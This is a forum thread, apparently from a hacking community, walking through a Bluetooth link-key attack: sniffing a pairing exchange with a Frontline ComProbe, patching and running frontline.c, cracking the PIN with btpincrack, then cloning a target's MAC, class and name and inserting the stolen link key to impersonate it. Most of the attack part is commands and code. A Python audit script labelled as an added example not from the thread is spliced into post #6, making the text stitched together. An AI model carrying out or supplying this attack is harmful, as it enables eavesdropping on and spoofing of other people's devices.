
Thread: Video Tutorial: Using frontline comprobe to crack a link key exchange.

  1. #1
    drgr33n (Very good friend of the forum)
    Join Date: Jan 2010
    Location: Dark side of the moon ...
    Posts: 699

    Video Tutorial: Using frontline comprobe to crack a link key exchange.

    Hey guys

    Been messing around with a few things and decided to make this little tutorial in the process.

    Enjoy ;D

    Blip.tv link

    http://blip.tv/file/952892/

    Youtube link

    http://www.youtube.com/watch?v=r8QLAnmZZ2E

  2. #2
    imported_wyze (Jenkem Addict)
    Join Date: Jul 2007
    Posts: 1,543

    Nice one doc ... maybe a write-up would be good too.
    dd if=/dev/swc666 of=/dev/wyze

  3. #3
    drgr33n (Very good friend of the forum)
    Join Date: Jan 2010
    Location: Dark side of the moon ...
    Posts: 699

    OK, here's the write-up on my video.

    OK, to set up this attack you will need the following:

    one or two bluetooth enabled devices
    frontline comprobe
    A regular bluetooth device (for getting MACs)
    a copy of frontline.c
    openciphers btpincrack

    First thing is to set up your lab. Let's get the Bluetooth hardware and services started.

    Code:
    hciconfig hci0 up
    hciconfig hci1 up
    bash /etc/rc.d/rc.bluetooth start

    You can check everything is running correctly by issuing the hciconfig command.

    Code:
    hciconfig

    OK, now we are ready to set up frontline.c.

    Now I have had some trouble with the frontline source code and my frontline comprobe. I am using the airsniffer47-bc04 and it seems the packet shift is double what is set in frontline.c ???

    I'm keen to find out what's going on and have asked the powers that be to look into this, and they have asked me to try a couple of things. One suggestion is to change FP_TYPE_SHIFT to 2, but it still has the same results. For now you will have to check it out for yourself, but if possible could somebody please try frontline.c with a dlink dbt120 without my mod and post the log?

    OK, open frontline.c in your fav editor and find the following ...

    Code:
    #define TYPE_DV		8

    #define LMP_IN_RAND	8
    #define LMP_COMB_KEY	9
    #define LMP_AU_RAND	11
    #define LMP_SRES	12

    Now change to the following values ...

    Code:
    #define TYPE_DV		16

    #define LMP_IN_RAND	16
    #define LMP_COMB_KEY	18
    #define LMP_AU_RAND	22
    #define LMP_SRES	24

    Save and exit, then compile with the following command (the library goes after the source file so the linker picks it up):

    Code:
    gcc frontline.c -o frontline -lbluetooth

    That's frontline.c patched, now we can start the sniffer.

    OK, if you run frontline with the -h tag you will see what options you have to play with. As explained in the video, to start the sniffing process you will need the master's and slave's MACs first. At the moment there is no way of telling who is the master or slave in a piconet; obviously you would know this info because this is your equipment we are using, right ??? ! lol But in a real situation it would just be trial and error and maybe a bit of an educated guess.

    OK, let's scan for devices; if you already know the MACs skip this step.

    Code:
    hcitool inq

    Good practice to always issue a stop to your sniffer before starting, just in case.

    Code:
    frontline -d hci1 -s

    Next we tell the comprobe to filter all frames.

    Code:
    frontline -d hci1 -f 7

    Next we add our MACs.

    Code:
    frontline -d hci1 -S MA:ST:ER:MA:C1@SL:AV:EM:AC:01

    Now let's start the sniffing process. -p tells frontline to look for a key exchange and -z tells frontline to ignore zero length packets, or in my language, crap.

    Code:
    frontline -d hci1 -p -z -e

    Now pair the two devices and you should see some data. Once the pairing process is complete, stop frontline and check back for the pairing process as seen in the video.

    Next compile btpincrack. I can't remember if you need to do anything to install onto bt3, so if you get errors post 'em and I'll fix 'em for you lol

    And run frontline's output through btpincrack as seen in the video. A 6 digit pin should take around 7 seconds.

    And you're done.

  4. #4
    The_Denv (Member)
    Join Date: Nov 2006
    Posts: 364

    Nice tutorial Doc, I'm still awaiting enough money to invest in a RAM bluetooth device with SMA connection. You seriously love your bluetooth hacking, it's really interesting. Can't wait until the day that I have the correct bluetooth adapter.

    Out of interest, what adapters are you using? What firmware are you using for them?

    Again, great tutorial. I like reading your work, gotta love that 'one to rule them all thread' ...

    ... EDIT: Wow, fast reply. I had this window opened whilst watching your vid. Looks like you already included the information I was talking about.

  5. #5
    imported_wyze (Jenkem Addict)
    Join Date: Jul 2007
    Posts: 1,543

    You're a good man Doc...
    dd if=/dev/swc666 of=/dev/wyze

  6. #6
    drgr33n (Very good friend of the forum)
    Join Date: Jan 2010
    Location: Dark side of the moon ...
    Posts: 699

    Thanks guys, I'm using a fujitsu-siemens bluetooth v2.0.

    EDIT:

    If you would like to then use the link key to connect to the device, first you would clone the MAC of the desired device. Then you need to change your device class and name to the same as the desired device. Next you need to add your link key to bt. Go to /var/lib/bluetooth/LO:CA:LM:AC:AD (replace with your device's MAC), open linkkeys and add the following.

    Code:
    CL:ON:ED:MA:C linkkeydatalinkkaydatalinkkeydatalinkkeydata 0*1 6*2

    *1 First channel available
    *2 Last channel available

    Save and you are good to go. This stuff is very naughty so please DO NOT USE ILLEGALLY !!!!!!!!!!!!!!!!!!!!!!!!!!!!!! I've sorta left bits out on purpose lol I will be adding all this stuff to Blue|Smash over the next day or two. After spoofing the link key anything is possible providing the spoofed device has clearance ;D
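    The post above shows the layout of a linkkeys record (remote address, key, key type, PIN length). As an added defensive example, not from the thread or from Blue|Smash, here is an audit script that reads such a file and flags legacy pairings made with short PINs, the ones this thread shows being recovered from a sniffed exchange. It assumes the legacy BlueZ 3.x record layout, and the sample records are constructed.

```python
import re

# Constructed sample in the legacy BlueZ 3.x linkkeys layout (an assumption):
#   <remote BD_ADDR> <link key, 32 hex chars> <HCI key type> <PIN length>
SAMPLE_LINKKEYS = """\
00:11:22:33:44:55 0123456789ABCDEF0123456789ABCDEF 0 4
AA:BB:CC:DD:EE:FF FEDCBA9876543210FEDCBA9876543210 0 6
DE:AD:BE:EF:00:01 0F1E2D3C4B5A69780F1E2D3C4B5A6978 0 16
CA:FE:00:00:00:01 A1B2C3D4E5F60718A1B2C3D4E5F60718 4 0
not a record, must be skipped
"""

RECORD_RE = re.compile(
    r"^([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\s+"  # remote address
    r"([0-9A-Fa-f]{32})\s+(\d+)\s+(\d+)$"          # key, type, PIN length
)

# HCI link key types 0x00-0x03 are legacy PIN-derived keys; 0x04 and up come
# from Secure Simple Pairing and are not derived from a PIN at all.
LEGACY_KEY_TYPES = {0, 1, 2, 3}

def parse_linkkeys(text):
    """Parse linkkeys text into dicts, skipping malformed lines."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m is None:
            continue
        bdaddr, key, key_type, pin_len = m.groups()
        records.append({"bdaddr": bdaddr.upper(), "key": key.upper(),
                        "key_type": int(key_type), "pin_length": int(pin_len)})
    return records

def weak_pairings(records, min_pin_digits=8):
    """Legacy pairings whose PIN was shorter than min_pin_digits.

    A combination key made from a 4-6 digit PIN is what the thread shows
    being recovered from a sniffed IN_RAND/COMB_KEY/AU_RAND/SRES exchange,
    so such entries should be re-paired with a long PIN or with SSP.
    """
    return [r for r in records
            if r["key_type"] in LEGACY_KEY_TYPES
            and r["pin_length"] < min_pin_digits]

if __name__ == "__main__":
    for r in weak_pairings(parse_linkkeys(SAMPLE_LINKKEYS)):
        print(f"{r['bdaddr']}: legacy key from a {r['pin_length']}-digit PIN")
```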

  7. #7
    Just burned his ISO
    Join Date: Jun 2008
    Posts: 14

    Now I receive this error when trying to connect:

    Cannot open '/dev/rfcomm0': No route to host

    I'm assuming this is due to cloning everything and the phone is getting mixed up due to the previous connection, and I can't delete the bluetooth entry unless I restore to default settings, which is not something I want to do. I'm also guessing this is the part you left out?

  8. #8
    drgr33n (Very good friend of the forum)
    Join Date: Jan 2010
    Location: Dark side of the moon ...
    Posts: 699

    akamagic, explain more ????

  9. #9
    Just burned his ISO
    Join Date: Jun 2008
    Posts: 14

    OK, let me go back a bit. First of all I'm having problems getting frontline to capture anything other than the unknown type:1 and type:4 caused by starting the devices. I followed everything in the write-up, including patching frontline, and also without. In the video you use hcidump, which clearly shows the process of my connection. So either frontline is my problem or it's my dongle. I have a DBT-120 C1 running up raw and so am almost positive it is in fact a sniffer:

    hci1: Type: USB
    BD Address: 00:1C:F0:EE:AAF ACL MTU: 0:0 SCO MTU: 0:0
    Sniff 47 (2006-02-15)
    Chip version: BlueCore4-External
    Max key size: 128 bit
    SCO mapping: HCI

    Any suggestions would be appreciated.

  10. #10
    drgr33n (Very good friend of the forum)
    Join Date: Jan 2010
    Location: Dark side of the moon ...
    Posts: 699

    Hey akamagic

    What are you trying to sniff? I've also had problems like this when two devices change roles. Also, distance is a big issue too; I would recommend you sniff only a foot away from the master.

    If you still get stuck post what you are trying to achieve including the equipment used.
